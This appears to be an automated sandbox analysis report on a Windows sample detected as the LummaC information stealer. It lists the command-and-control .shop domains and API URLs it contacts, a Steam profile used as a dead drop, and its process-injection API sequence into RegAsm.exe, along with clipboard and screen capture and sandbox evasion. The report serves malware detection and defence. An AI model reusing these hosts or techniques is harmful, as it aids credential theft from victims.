Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawzhotdog.shop/api-
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/api
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/api
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiD
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/m
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/api
Source: A6QFRW2WiY.exe	String found in binary or memory: https://www.entrust.net/rpa0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00437DE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00437DE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00437DE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00437DE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00438247 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_00438247

System Summary

.NET source code contains very large array initializations

Source: A6QFRW2WiY.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 357376

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F870	3_2_0040F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401000	3_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A0C0	3_2_0040A0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E080	3_2_0040E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415081	3_2_00415081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B150	3_2_0040B150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00431167	3_2_00431167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0044A120	3_2_0044A120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409269	3_2_00409269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004082A0	3_2_004082A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043F2AC	3_2_0043F2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004362B0	3_2_004362B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401379	3_2_00401379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004483F0	3_2_004483F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004013BC	3_2_004013BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409442	3_2_00409442
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042D4B0	3_2_0042D4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00436560	3_2_00436560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F5D0	3_2_0042F5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004015DE	3_2_004015DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A5E0	3_2_0040A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042C5E3	3_2_0042C5E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00428581	3_2_00428581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00403660	3_2_00403660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410690	3_2_00410690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004487D0	3_2_004487D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00447870	3_2_00447870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004378C0	3_2_004378C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00407900	3_2_00407900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040C9D0	3_2_0040C9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DACA	3_2_0041DACA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406B60	3_2_00406B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00437B70	3_2_00437B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CB0F	3_2_0042CB0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042ABF9	3_2_0042ABF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00443B90	3_2_00443B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BC60	3_2_0040BC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040ACC0	3_2_0040ACC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00426D6F	3_2_00426D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00447D70	3_2_00447D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CD08	3_2_0042CD08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00412D20	3_2_00412D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404DB0	3_2_00404DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00449E50	3_2_00449E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00413E12	3_2_00413E12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00410ED0	3_2_00410ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0043DF50	3_2_0043DF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406F00	3_2_00406F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408FCE	3_2_00408FCE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041C710 appears 153 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040C7C0 appears 50 times

Source: A6QFRW2WiY.exe

Static PE information: invalid certificate

Source: A6QFRW2WiY.exe, 00000000.00000000.2050142658.000000000022C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exe< vs A6QFRW2WiY.exe
Source: A6QFRW2WiY.exe, 00000000.00000002.2065341994.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs A6QFRW2WiY.exe
Source: A6QFRW2WiY.exe	Binary or memory string: OriginalFilenameVQP.exe< vs A6QFRW2WiY.exe

Source: A6QFRW2WiY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: A6QFRW2WiY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/2@10/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004373B7 CoCreateInstance,

3_2_004373B7

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\A6QFRW2WiY.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03

Source: A6QFRW2WiY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: A6QFRW2WiY.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: A6QFRW2WiY.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\A6QFRW2WiY.exe "C:\Users\user\Desktop\A6QFRW2WiY.exe"
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: A6QFRW2WiY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: A6QFRW2WiY.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: A6QFRW2WiY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00440466 push ds; ret		3_2_00440468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416D75 push ebx; ret		3_2_00416D77

Source: A6QFRW2WiY.exe

Static PE information: section name: .text entropy: 7.995724440591308

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory allocated: BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory allocated: 44D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe TID: 1996	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5536	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn,u

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00445D10 LdrInitializeThunk,

3_2_00445D10

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Code function: 0_2_024D2149 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_024D2149

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: A6QFRW2WiY.exe, 00000000.00000002.2068601923.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45D000	Jump to behavior
Source: C:\Users\user\Desktop\A6QFRW2WiY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 111A008	Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\A6QFRW2WiY.exe

Queries volume information: C:\Users\user\Desktop\A6QFRW2WiY.exe VolumeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 PowerShell	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
